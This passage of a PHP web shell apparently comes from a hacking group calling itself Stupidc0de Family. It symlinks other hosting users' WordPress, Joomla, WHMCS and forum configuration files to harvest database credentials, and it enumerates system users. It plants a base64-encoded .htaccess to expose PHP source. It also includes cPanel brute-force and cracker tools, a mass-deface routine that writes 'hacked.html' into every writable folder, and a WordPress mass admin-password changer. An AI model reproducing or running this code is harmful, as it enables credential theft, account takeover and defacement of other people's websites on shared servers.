725. symlink('/home2/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
726. symlink('/home2/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
727. symlink('/home2/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
728. symlink('/home2/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
729. symlink('/home2/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
730. symlink('/home2/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
731. symlink('/home2/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
732. symlink('/home2/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
733. symlink('/home2/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
734. symlink('/home2/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
735. symlink('/home2/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
736. symlink('/home2/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
737. symlink('/home2/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
738. symlink('/home2/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
739. symlink('/home2/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
740. symlink('/home2/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
741. symlink('/home2/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
742. symlink('/home2/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
743. symlink('/home2/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
744. symlink('/home2/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
745. symlink('/home2/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
746. symlink('/home2/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
747. symlink('/home2/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
748. symlink('/home2/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
749. symlink('/home3/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
750. symlink('/home3/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
751. symlink('/home3/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
752. symlink('/home3/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
753. symlink('/home3/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
754. symlink('/home3/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
755. symlink('/home3/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
756. symlink('/home3/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
757. symlink('/home3/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
758. symlink('/home3/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
759. symlink('/home3/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
760. symlink('/home3/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
761. symlink('/home3/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
762. symlink('/home3/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
763. symlink('/home3/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
764. symlink('/home3/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
765. symlink('/home3/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
766. symlink('/home3/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
767. symlink('/home3/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
768. symlink('/home3/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
769. symlink('/home3/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
770. symlink('/home3/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
771. symlink('/home3/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
772. symlink('/home3/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
773. symlink('/home3/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
774. symlink('/home3/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
775. symlink('/home3/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
776. symlink('/home3/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
777. symlink('/home3/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
778. symlink('/home3/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
779. symlink('/home4/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
780. symlink('/home4/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
781. symlink('/home4/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
782. symlink('/home4/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
783. symlink('/home4/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
784. symlink('/home4/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
785. symlink('/home4/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
786. symlink('/home4/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
787. symlink('/home4/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
788. symlink('/home4/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
789. symlink('/home4/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
790. symlink('/home4/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
791. symlink('/home4/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
792. symlink('/home4/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
793. symlink('/home4/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
794. symlink('/home4/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
795. symlink('/home4/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
796. symlink('/home4/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
797. symlink('/home4/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
798. symlink('/home4/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
799. symlink('/home4/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
800. symlink('/home4/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
801. symlink('/home4/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
802. symlink('/home4/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
803. symlink('/home4/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
804. symlink('/home4/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
805. symlink('/home4/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
806. symlink('/home4/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
807. symlink('/home4/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
808. symlink('/home4/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
809. symlink('/home5/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
810. symlink('/home5/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
811. symlink('/home5/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
812. symlink('/home5/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
813. symlink('/home5/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
814. symlink('/home5/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
815. symlink('/home5/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
816. symlink('/home5/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
817. symlink('/home5/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
818. symlink('/home5/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
819. symlink('/home5/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
820. symlink('/home5/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
821. symlink('/home5/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
822. symlink('/home5/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
823. symlink('/home5/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
824. symlink('/home5/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
825. symlink('/home5/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
826. symlink('/home5/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
827. symlink('/home5/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
828. symlink('/home5/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
829. symlink('/home5/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
830. symlink('/home5/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
831. symlink('/home5/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
832. symlink('/home5/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
833. symlink('/home5/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
834. symlink('/home5/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
835. symlink('/home5/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
836. symlink('/home5/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
837. symlink('/home5/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
838. symlink('/home5/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
839. symlink('/home6/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
840. symlink('/home6/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
841. symlink('/home6/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
842. symlink('/home6/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
843. symlink('/home6/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
844. symlink('/home6/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
845. symlink('/home6/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
846. symlink('/home6/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
847. symlink('/home6/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
848. symlink('/home6/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
849. symlink('/home6/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
850. symlink('/home6/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
851. symlink('/home6/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
852. symlink('/home6/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
853. symlink('/home6/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
854. symlink('/home6/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
855. symlink('/home6/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
856. symlink('/home6/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
857. symlink('/home6/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
858. symlink('/home6/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
859. symlink('/home6/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
860. symlink('/home6/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
861. symlink('/home6/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
862. symlink('/home6/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
863. symlink('/home6/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
864. symlink('/home6/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
865. symlink('/home6/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
866. symlink('/home6/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
867. symlink('/home6/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
868. symlink('/home6/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
869. symlink('/home7/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
870. symlink('/home7/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
871. symlink('/home7/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
872. symlink('/home7/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
873. symlink('/home7/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
874. symlink('/home7/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
875. symlink('/home7/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
876. symlink('/home7/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
877. symlink('/home7/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
878. symlink('/home7/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
879. symlink('/home7/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
880. symlink('/home7/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
881. symlink('/home7/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
882. symlink('/home7/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
883. symlink('/home7/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
884. symlink('/home7/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
885. symlink('/home7/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
886. symlink('/home7/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
887. symlink('/home7/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
888. symlink('/home7/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
889. symlink('/home7/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
890. symlink('/home7/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
891. symlink('/home7/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
892. symlink('/home7/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
893. symlink('/home7/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
894. symlink('/home7/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
895. symlink('/home7/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
896. symlink('/home7/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
897. symlink('/home7/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
898. symlink('/home7/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
899. }
900.  
901. $d0mains = @file("/etc/named.conf");
902.  
903. if($d0mains)
904. {
905. mkdir($fn);
906. chdir($fn);
907.  
908. foreach($d0mains as $d0main)
909. {
910. if(eregi("zone",$d0main))
911. {
912. preg_match_all('#zone "(.*)"#', $d0main, $domains);
913. flush();
914.  
915. if(strlen(trim($domains[1][0])) > 2)
916. {
917. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
918.  
919. syml($user['name'],$domains[1][0]);
920. }
921. }
922. }
923. echo "<center><font color=springgreen size=3>Done</font></center>";
924. echo "<br><center><a href=$fn/ target=_blank><font size=3 color=#009900>Here</font></a></center>";
925. }
926. else
927. {
928. mkdir($fn);
929. chdir($fn);
930. $temp = "";
931. $val1 = 0;
932. $val2 = 1000;
933. for(;$val1 <= $val2;$val1++)
934. {
935. $uid = @posix_getpwuid($val1);
936. if ($uid)
937. $temp .= join(':',$uid)."\n";
938. }
939. echo '<br/>';
940. $temp = trim($temp);
941.  
942. $file5 = fopen("test.txt","w");
943. fputs($file5,$temp);
944. fclose($file5);
945.  
946. $htaccess =
947. 'T3B0aW9ucyBhbGwgCkRpcmVjdG9yeUluZGV4IHJlYWRtZS5odG1sIApBZGRUeXBlIHRleHQvcGxh
948. aW4gLnBocCAKQWRkSGFuZGxlciBzZXJ2ZXItcGFyc2VkIC5waHAgCkFkZFR5cGUgdGV4dC9wbGFp
949. biAuaHRtbCAKQWRkSGFuZGxlciB0eHQgLmh0bWwgClJlcXVpcmUgTm9uZSAKU2F0aXNmeSBBbnk=
950. ';
951. $file = fopen(".htaccess","w+");
952. $write = fwrite ($file ,base64_decode($htaccess));
953.  
954. $file = fopen("test.txt", "r") or exit("Unable to open file!");
955. while(!feof($file))
956. {
957. $s = fgets($file);
958. $matches = array();
959. $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
960. $matches = str_replace("home/","",$matches[1]);
961. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
962. continue;
963. syml($matches,$matches);
964. }
965. fclose($file);
966. echo "</table>";
967. unlink("test.txt");
968. echo "<center><font color=springgreen size=3>Done</font></center>";
969. echo "<br><center><a href=$fn/ target=_blank><font size=3 color=#009900>Here</font></a></center>";
970. }
971. echo "<hr><center><b><a href=".$_SERVER['PHP_SELF'].">BACK</a>";
972. exit;
973. }
974. ?>
975. <form method="POST" target="_blank">
976. <input name="page" type="hidden" value="find">
977. <table border=1>
978. <body bgcolor="black" text="white"><br><br>
979.  
980. <center><b><font size="2" style="italic" color="white">Cpanel BruteForce<br><br></b></center></td></tr>
981. <tr>
982. <td>
983. <strong>User :</strong>
984. </td>
985. <td>
986. <strong><textarea cols="50" style="background:#191818;outline:none;color:white;" rows="5" name="usernames"><?php system('ls /var/mail');?></textarea></strong>
987. </td>
988. <tr>
989. <td>
990. <strong>Pass :</strong>
991. </td>
992. <td>
993. <strong><textarea cols="50" style="background:#191818;outline:none;color:white;" rows="5" name="passwords"></textarea></strong>
994. </td>
995. </tr>
996. <tr>
997. <td>
998. <strong>Type :</strong>
999. </td>
1000. <td>
1001. <span style="background:#191818;outline:none;color:white;"><strong>Simple : </strong> </span>
1002. <strong>
1003. <input type="radio" name="type" value="simple" checked="checked" class="style3"></strong>
1004. <font style="background:black;outline:none;color:white;"><strong>/etc/passwd : </strong> </font>
1005. <strong>
1006. <input type="radio" name="type" value="passwd" style="background:black;outline:none;color:white;"></strong><span class="style3"><strong>
1007. </strong>
1008. </span>
1009. <td style="background:black;outline:none;color:white;" >
1010. <strong><input class ='bordergaya' type="submit" value="START"></strong>
1011. </td>
1012. </tr>
1013. </table>
1014. <br>
1015. <table border=1>
1016. </form>
1017. <tr>
1018. <td style="background:black;outline:none;color:white;">
1019. <strong>Get Wordlist</strong>
1020. <form method="POST" target="_blank">
1021. <strong>
1022. <input name="pass" type="hidden" value="password">
1023. </strong>
1024. <strong>Url Config :</strong>
1025. <td>
1026.  
1027. <strong>
1028. <input style="background:black;outline:none;color:white;" size="80" name="url" type="text"></strong>
1029.  
1030. <td style="background:black;outline:none;color:white;"><strong><input class ='bordergaya' type="submit" value="GO">
1031. </strong>
1032. </td>
1033. </table>
1034. <?php
1035. echo"<br/><br/>";
1036. break;
1037. }
1038. elseif(isset($_GET['x']) && ($_GET['x'] == 'massde'))
1039. {
1040. ?></center></center>
1041. <style type="text/css">
1042. .ketengah{
1043. text-align: left;
1044. font-size: 16px;
1045. color: orange;
1046. font-family: Homenaje;
1047. margin-left: 30%;
1048. </style>
1049. <?php
1050. /*thanks To IndoXploit*/
1051. function sabun_massal($path,$namafile,$isi_script) {
1052. if(is_writable($path)) {
1053. $patha = scandir($path);
1054. foreach($patha as $pathb) {
1055. $pathc = "$path/$pathb";
1056. $lokasi = $pathc.'/'.$namafile;
1057. if($pathb === '.') {
1058. file_put_contents($lokasi, $isi_script);
1059. } elseif($pathb === '..') {
1060. file_put_contents($lokasi, $isi_script);
1061. } else {
1062. if(is_dir($pathc)) {
1063. if(is_writable($pathc)) {
1064. echo "<font class='ketengah'><font color=crimson>-:-</font><font color=white>Sukses Bos Q</font><font color=crimson>-:-</font> <font color=springgreen>Cek di :</font> $lokasi</font><br>";
1065. file_put_contents($lokasi, $isi_script);
1066. $idx = sabun_massal($pathc,$namafile,$isi_script);
1067. }
1068. }
1069. }
1070. }
1071. }
1072. }
1073. if($_POST['start']) {
1074. echo "<div style='margin: 5px auto; padding: 5px'>";
1075. sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
1076. echo "</div>";
1077. } else {
1078. echo "<center>";
1079. echo "<form method='post'><br><br>
1080. <table>
1081. <tr>
1082. <td><font style='text-decoration: underline; margin-left:10px;'>Folder</font></td>
1083. <td align='center'>:</td>
1084. <td><input class='justborder' type='text' name='d_dir' value='$path' style='width: 95%;' height='10'><br></td>
1085. </tr>
1086. <tr>
1087. <td><font style='text-decoration: underline; margin-left:10px;'>Filename</font></td>
1088. <td align='center'>:</td>
1089. <td><input class='justborder' type='text' name='d_file' value='hacked.html' style='width: 95%;' height='10'><br></td>
1090. </tr>
1091. <tr>
1092. <td colspan='3' align='center'><font style='text-decoration: underline;'>Script Deface : </font><br></td>
1093. </tr>
1094. <tr>
1095. <td colspan='3'><textarea class='justborder' name='script' style='width: 500px; height: 200px;'>Hacked by Stupidc0de Family!</textarea><br></td>
1096. </tr>
1097. <tr>
1098. <td colspan='3' align='center'><input class='justborder' type='submit' name='start' value='Mass Deface' style='width: 50%;'><br/></td>
1099. </tr>
1100. </table><br><br><br>
1101. </form></center><br/>";
1102. }break;?><center><center><?php
1103. }
1104. elseif(isset($_GET['x']) && ($_GET['x'] == 'mpc'))
1105. {
1106. ?>
1107. <form action="?path=<?php echo $path; ?>&amp;x=mpc" method="post">
1108. <?php
1109. set_time_limit(0);
1110. ini_set('display_errors', 0);
1111.  
1112. echo '<center><h2>WordPress Mass Password Changer</h2><br /><br/></center>';
1113. echo '<form method="POST" action="" >
1114. <center><table border="1" class="justborder"><tr><td>Config List:</td>
1115. <td><textarea class="justborder" name="url" cols="50" rows="10" ></textarea></td></tr>
1116. <tr><td>User/Password</td><td><input class="justborder" type="text" name="username" size="25" value="Psrmrh"> /
1117. <input class="justborder" type="text" name="password" size="25" value="stupidc0de"></td></tr></table>
1118. <br><input class="bordergaya" type="Submit" class="button" value="Submit"><input type="hidden" name="action" value="1"></form></center>';
1119.  
1120. if ($_POST['action']=='1'){
1121. if ($_POST['url']==''){
1122. echo "<div class='result'>No CONFIG FOUND<br>Make sure you provided a config list!</div><br>";
1123. }else{
1124. $url=$_POST['url'];
1125. $users = explode("\n",$url);
1126. foreach ($users as $user) {
1127. $user1=trim($user);
1128. $code=file_get_contents2($user1);
1129. preg_match_all('|define.*\(.*\'DB_NAME\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b1);
1130. $db=$b1[1][0];
1131. preg_match_all('|define.*\(.*\'DB_USER\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b2);
1132. $user=$b2[1][0];
1133. preg_match_all('|define.*\(.*\'DB_PASSWORD\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b3);
1134. $db_password=$b3[1][0];
1135. preg_match_all('|define.*\(.*\'DB_HOST\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b4);
1136. $host=$b4[1][0];
1137. preg_match_all('|\$table_prefix.*=.*\'(.*)\'.*;|isU',$code,$b5);
1138. $p=$b5[1][0];
1139.  
1140. $d=@mysql_connect( $host, $user, $db_password ) ;
1141. if ($d){
1142. @mysql_select_db($db );
1143. $usern=$_POST['username'];
1144. $passwd=$_POST['password'];
1145. $sql = "UPDATE `".$p."users` SET `user_pass` = MD5( '".$passwd."' ) WHERE `ID` = '1';";
1146. @mysql_query($sql) ; ;
1147. $sql = "UPDATE `".$p."users` SET `user_login` = '".$usern."' WHERE `ID` = '1';";
1148. @mysql_query($sql) ; ;
1149. $aa=@mysql_query("select option_value from `".$p."options` WHERE `option_name` = 'siteurl';") ;;
1150. $siteurl=@mysql_fetch_array($aa) ;
1151. $siteurl=$siteurl['option_value'];
1152. $tr.="$siteurl\n";
1153. mysql_close();
1154. }
1155. }
1156. if ($tr)
1157. $filename = 'changed.txt';
1158. $fp = fopen($filename, "a+");
1159. $write = fputs($fp, $tr);
1160. fclose($fp);
1161. echo "<div class='result'>Password Changing Completed ! :)<br><br>";
1162. echo "<a href='changed.txt' target='_blank'>View List of Password Changed Sites</a></div><br/>";
1163.  
1164. }
1165. }
1166. function file_get_contents2($u){
1167. $ch = curl_init();
1168. curl_setopt($ch,CURLOPT_URL,$u);
1169. curl_setopt($ch, CURLOPT_HEADER, 0);
1170. curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
1171. curl_setopt($ch,CURLOPT_USERAGENT,"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0 ");
1172. $result = curl_exec($ch);
1173. return $result ;
1174. }
1175. echo "<br /><br />";
1176. break;
1177. ?>
1178. <?php }
1179. elseif(isset($_GET['x']) && ($_GET['x'] == 'masstool'))
1180. {
1181. echo "<br/><br/>Monggo Pilih Toolsnya Bos Q ~_^<br/><br/>";
1182. ?>
1183. <a href="?<?php echo "path=".$path; ?>&amp;x=massde"><input class=bordergaya type=submit value="Mass Deface" /></a>
1184. Or <a href="?<?php echo "path=".$path; ?>&amp;x=mpc"><input class=bordergaya type=submit value="Wordpress Mass Password Changer" /></a>
1185. Or <a href="?<?php echo "path=".$path; ?>&amp;x=zonesH"><input class=bordergaya type=submit value="Zone-H Mass Notifier" /></a>
1186.  
1187. <?php
1188. break;
1189. }
1190. elseif(isset($_GET['x']) && ($_GET['x'] == 'tentang'))
1191. {
1192. echo"<br><br>
1193. <center><b>
1194. <font face='Jolly Lodger' color='white' size='6px'> [+] Stupidc<font color='teal'>0</font>de Family [+]</font><br>
1195. <br>
1196. <font face='Fredericka The Great' color='white' size='3px'>&hearts; Respect Us, Little Crazy Family From Indonesia ^_^ &hearts;<br><br>
1197. -:- No Leader We Just Laugh Together -:-</font><br><br>
1198. <font color='gray'> http://www.stupidc0de.family/ </font><br><br><br>
1199. </center>
1200. </b>";
1201. break;
1202. }
1203.  
1204.  
1205. elseif(isset($_GET['x']) && ($_GET['x'] == 'cpanel'))
1206. {
1207. echo "<br/><br/>Monggo Pilih Toolsnya Bos Q ~_^<br/><br/>";
1208. ?>
1209.  
1210. <a href="?<?php echo "path=".$path; ?>&amp;x=brute"><input class=bordergaya type=submit value="Cpanel Bruteforce" /></a>
1211. Or <a href="?<?php echo "path=".$path; ?>&amp;x=cpcrack"><input class=bordergaya type=submit value="Auto Cpanel Finder/Cracker" /></a>
1212. <br/><br/><br/><br/>
1213. <?php break; ?>
1214.  
1215. <?php
1216. }
1217. elseif(isset($_GET['x']) && ($_GET['x'] == 'cpcrack'))
1218. {
1219. ?>
1220. <form action="?path=<?php echo $path; ?>&amp;x=cpcrack" method="post">
1221. <?php
1222.  
1223. @ini_set('display_errors',0);
1224. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
1225. $ar0=explode($marqueurDebutLien, $text);
1226. $ar1=explode($marqueurFinLien, $ar0[$i]);
1227. return trim($ar1[0]);
1228. }
1229.  
1230. echo '<h1>Cpanel Finder/Cracker</h1><br/>';
1231.  
1232. echo "<center>";
1233. $d0mains = @file('/etc/named.conf');
1234. $domains = scandir("/var/named");
1235.  
1236. if ($domains or $d0mains)
1237. {
1238. $domains = scandir("/var/named");
1239. if($domains) {
1240. echo "<table align='center'><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th><th> Password </th><th> .my.cnf </th></tr>";
1241. $count=1;
1242. $dc = 0;
1243. $list = scandir("/var/named");
1244. foreach($list as $domain){
1245. if(strpos($domain,".db")){
1246. $domain = str_replace('.db','',$domain);
